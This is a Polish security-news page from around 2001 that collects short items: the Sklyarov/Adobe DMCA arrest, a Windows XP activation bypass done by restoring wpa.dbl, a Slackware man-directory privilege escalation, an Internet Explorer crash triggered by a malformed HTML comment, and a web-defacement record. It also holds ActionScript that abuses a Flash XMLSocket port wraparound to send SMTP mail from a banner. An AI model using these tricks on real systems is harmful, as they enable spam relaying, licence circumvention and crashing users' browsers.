Aktualności

Wczoraj pisałem o hackerach, którzy za swoją pracę opłacani są przez rosyjską mafię. Dzisiejszego dnia agenci FBI dokonali aresztowania rosyjskiego programisty, którego jak się okazało przestępstwem było złamanie zabezpieczeń opracowanych przez firmę Adobe Systems.

Złapany to dość znany pracownik jednej z moskiewskiej firmy softwarowej ElcomSoft – Dmitry Skylarov. Dmitry został zatrzymany w Las Vegas, gdzie odbywa się hakerska konferencja Def Con. Do aresztowania doszło niedługo po wygłoszeniu referatu na temat reklamowanego i rzeczywistego poziomu zabezpieczeń stosowanych do ochrony treści elektronicznych książek. Program Dimitriego – Advanced eBook Processor – umożliwia usunięcie ograniczeń i przekształcenie zabezpieczonych plików do formatu PDF.

Firma Adobe, a właściwie jej pracownicy, postanowili wykorzystać tą okazję i donieśli FBI o możliwości złapania osoby, która pogwałciła kontrowersyjną ustawę Digital Millennium Copyright Act (DMCA), zdaniem wielu faworyzującą duże firmy oraz stosowane przez nie – często nieskuteczne – systemy ochrony danych.

Ów dekoder książek w formacie Adobe eBook, sprzedawany początkowo był za 100 USD, przy czym jest produktem zupełnie legalnym poza USA. Po wniesionych groźbach ze strony firmy Adobe, autorzy postanowili przenieść swą witrynę internetową do Rosji i udostępnić program bezpłatnie. Po kolejnych oskarżeniach doszło wreszcie do użycia sił policyjnych i osadzenia winowajcy w areszcie. Po przeniesieniu Dimitriego do San Francisco czeka go proces, który może się skończyć nawet 500 tysiącami dolarów grzywny i 5-letnim pobytem w więzieniu.

Jeden z czytelników Slashdota komentuje to zdarzenie: „Byłoby to dosyć ironiczne, gdyby obywatel Rosji miał walczyć z amerykańskim prawem, ograniczającym jego wolność słowa”. Wielu hakerów twierdzi, że na podstawie obowiązującego prawa FBI może ścigać niemal każdą osobę, zajmującą się zawodowo komputerowymi systemami zabezpieczeń.

Zabezpieczenie najnowszego produktu Windows XP giganta z Redmont – aktywacja produktu (Windows Product Activation)miała być jednym z kontrowersyjnych zabezpieczeń. Zabezpieczenie WPA (Windows Product Activation) miało spowodować, że niemożliwe stanie się nielegalne kopiowanie softwaru firmy Microsoft. Jednak tak nie będzie.

Nasi zachodni przyjaciele ujawnili, iż najnowsza wersja WPA oferowana wraz z RC1 jest pełna dziur i może być prawie całkowicie zignorowana.

Aktywacja produktu według niemieckego serwisu Techhannel, jest bardzo prosta do ominięcia, bowiem wszystkie informacje koncentrują się wokół jednego pliku – wpa.dbl, który znajduje się w katalogu System32 systemu Windows XP.

W pliku tym znajdują się informacje dotyczące konfiguracji sprzętowej komputera w momencie aktywacji systemu. Kiedy Windows zarejestruje dokonanie więcej niż trzech zmian w sprzętowej konfiguracji komputera, usuwa opisywany plik. Użytkownik musi następnie aktywować swój system w wyżej opisany sposób. Co więcej – musi to zrobić natychmiast, jeśli XP był zainstalowany ponad 30 dni temu (lub 14 w przypadku RC1).

Cóż więc zrobili niemieccy pracownicy z Tecchnannel? Na początek skopiowali w bezpieczne miejsce plik wpa.dbl. Następnie zaczęli wymieniać poszczególne elementy komputera. Po wymianie dwóch wszystko działało jak należy. Wymiana trzeciego – procesora – również nie powinna wpłynąć na system operacyjny. Okazuje się jednak, że procesor odczytywany jest jako dwa elementy – standardowo jako CPU oraz jego numer seryjny. Nawet wyłączenie w BIOS’ie numeru seryjnego nic nie pomoże.

Tak więc co w tej sytuacji można dalej zrobić? Bardzo proste! Przekopiować z powrotem na swoje miejsce wcześniej zachowany plik konfiguracyjny i wszystko nadal będzie działac.

Jeżeli Microsoft nie dokona żadnych zmian w WPA przed oficjalną premierą Windows XP, implementacja technologii aktywacyjnej WPA stanie się bezsensownym zamiarem.

Jak głosi FBI (Federalne Biuro Śledcze), w ostatnim czasie ponad 40 firm w 40 stanach stało się obiektem ataku hackerów opłacanych przez zorganizowane grupy przestępcze z Europy Wschodniej, którzy pracując dla rosyjskiej mafii coraz częściej atakują amerykańskie banki oraz sklepy internetowe.

Prawdopodobnie wschodni „najemnicy” ukradli już około miliona numerów kart kredytowych.

Według przedstawicieli FBI, ciągłe włamania, przeprowadzane z terenu byłego ZSRR, za które odpowiedzialni są hackerzy opłacani przez rosyjską mafię, stanowią poważne zagrożenie dla amerykańskiej gospodarki, natomiast zdaniem ekspertów, ataki te zdarzają się coraz częściej i są też coraz bardziej trudniejsze do wykrycia oraz odparcia.

Jak twierdzi asystent dyrektora FBI John Collingwood, prawdopodobnie w najbliższym czasie można spodziewać się wzrostu liczb kolejnych ataków, które mogą spowodować ogromne straty w gospodarce USA.

W Slackware 8.0 a także w wcześniejszych wersjach, wystepuje poważny błąd w bibliotece man który może przekreślić bezpieczeństwo naszego serwera.

Dokładnie chodzi tu o złe ustawienia praw w /var/man/cat*/ które są standardowo ustawione na chmod 1777. Co nam daje taki błąd? Jak się okazuje dość sporo! Wystarczy, że odpowiednio zmodyfikujemy zmienną export PATH=, aby dostać przywilej root’a.

Aby do tego niedoprowadzić, należy zmienić parametry praw dostępu:

chmod 700 /var/man/cat*

Błąd dotyczy programu init w Slacku 7.1 i nowszych. Stanowi on zagrożenie dla informacji zapisanych na dysku.

Wykonanie polecenia halt (czyli zatrzymanie systemu), a następnie ponownie halt powoduje, że wszystkie procesy są zatrzymane, jakkolwiek zawartość partycji jest ciągle dostępna.

Próba zapisania czegoś na dysku może doprowadzić do całkowitego uszkodzenia systemu plików.

Jeżeli taka sytuacja ma miejsce, należy zrestartować system
i uruchomic efschk.

Kolejny bug (?) odkryty przez MagnatLU, ale tym razem w IE 4.0, a dokładnie w pliku URLMON.DLL.

Otoz przy zapisywaniu strony na dysk (przez IE) na samej gorze (przed i za ‚DOCTYPE’) jest wciskany komentarz typu:
<!– saved from url=(####)http://adres.strony.ktora.jest.zapisywana –>
gdzie #### to czterocyfrowa liczba – dlugosc adresu przy otwieraniu stron IE odczytuje ten komentarz (niewiadomo po co) uzywajac prawdopodobnie czegos w stylu ‚sscanf’ bo jak tekst nie bedzie sie zgadzal z formatem „(####)$$$$$$” to przegladarka sie wykrzacczy – czasami poprostu wyskakuje blad i sie zamyka jedno okienko, a czasami nawet wyskakuje Blue Screen of Death. Ciekawe sa efekty umieszczenia tego na pulpicie jako element Active Desktop.

PRZYKLAD:
stworz dowolny plik .html i wpisz w nim tylko

<!– saved from url=cokolwiek –>

a nastepnie odpal go w IE. Niestety niewiem jak reaguja na cos takiego inne wersje tej przegladarki (Netszkapa jest raczej bezpieczna… IE6.0 także – przyp. red.)

Acha – czasami, gdy sie odpowiednio dobierze liczbe, bledzik tez wystepuje. Narazie nie mam informacji co do konkretniejszczego wykorzystania tej „dziurki” (?) – ale mozliwe ze da sie zrobic cos w stylu starych, dobrych exploitow linuxowych.

Jeden z naszych czytelników przesłał informację, dotycząca ciekawego błędu który występuje prawdopodobnie w wersji Flash 5.0

update: Dla zainteresowanych zamieszczam źródło głównego kodu programu

Tak więc zaczynamy:

Prawdopodobnie udalo mi sie znalesc ‚buga’ we flashu (ver. 5) a dokladnie w tworzonych przez niego plikach.
Otoz we flashu jest cos takiego jak XMLSocket – dziala jak zwykly socket pod linuxem / windoza – i ma ograniczenie – nr portu musi byc wiekszy od 1024 (ze zrozumialych przyczyn). Funkcja otwierajaca port (polaczenie wychodzace) przyjmuje jako parametr wartosci longint. Gdy sie do niej wysle wartosc wieksza niz 65535 (max. nr portu) to sie polaczy z portem (nr mod 65535)
Uzywajac tego mozna zrobic we flashu bannerek, ktory przy otwieraniu polaczy sie z serverem np. smtp.poczta.onet.pl na porcie 65535+25 i moze normalnie wyslac m@ila.

– MagnatLU

Źródło głównego kodu programu:

sock = new XMLSocket();
sock.connect( ‚smtp.poczta.onet.pl’, 65536+25 );
sock.send(‚\nHELO strona\n’);
sock.send(‚\nMAIL FROM: \n’);
sock.send(‚\nRCPT TO: \n’);
sock.send(‚\nDATA\n’);
sock.send(‚\nMiales racje, to dziala !!!\n’);
sock.send(‚\n.\n’);
sock.send(‚\nQUIT\n’);
//sock.close()

Przyklad jest bardzo prosty, tylko wysyła dane, nie czeka na odpowiedz serwera, ale z doświadczeń wynika, że to wystarcza przy większości systemów.

Użytkownicy znakomitej dystrybucji Slackware narzekają, na (ubogą w porównaniu z np. Debianem) bazę pakietów. Zgodnie z zasadą „Polak potrafi” grupa polskich fanów Slacka rozpoczęła budowanie pakietów na własną rękę.

Obecnie w skład projektu wchodzi około 100 pakietów, min: alsa, iproute, zmailer…

Wszystkie pakiety są dostępne pod adresem: ftp.slackware.pl

Jeżeli chcesz się przyłączyć do projektu, napisz na ten adres.

Tak to prawda! Jak się okazuje, można oglądać filmy w formacie DivX zarówno pod X’ami jak i pod konsolą, a idealnie do tego nadaje się właśnie mplayer w wersji 0.18. Zainteresowanych odsyłam do pobrania mplayera, a także polskich fontów do niego. Miłego oglądania…

TAK! To światowy, hackerski rekord. Grupa hackerska World of Hell, w skrócie WoH, wczorajszego dnia dokonała podmiany prawie 700 stron w ciągu jednej minuty.

RaFa – jeden z członków grupy World of Hell, oznajmił, że do ataku został wykorzystany skrypt który dobrze radzi sobie zarówno z systemami IIS, NT jak i Unixami i Linuxami.

Na podmienionych stronach hackerzy zamieścili informację:

„WoH is back ! 0wning over +600 sites in 1 minute, cute record.
& kiss my ass cause I just 0wned yours.”

Pełna lista podmienionych stron znajduje się pod tym adresem.

Ciekawe kiedy nasi Polscy hackerzy dokonają równie godnego uwagi wyczynu…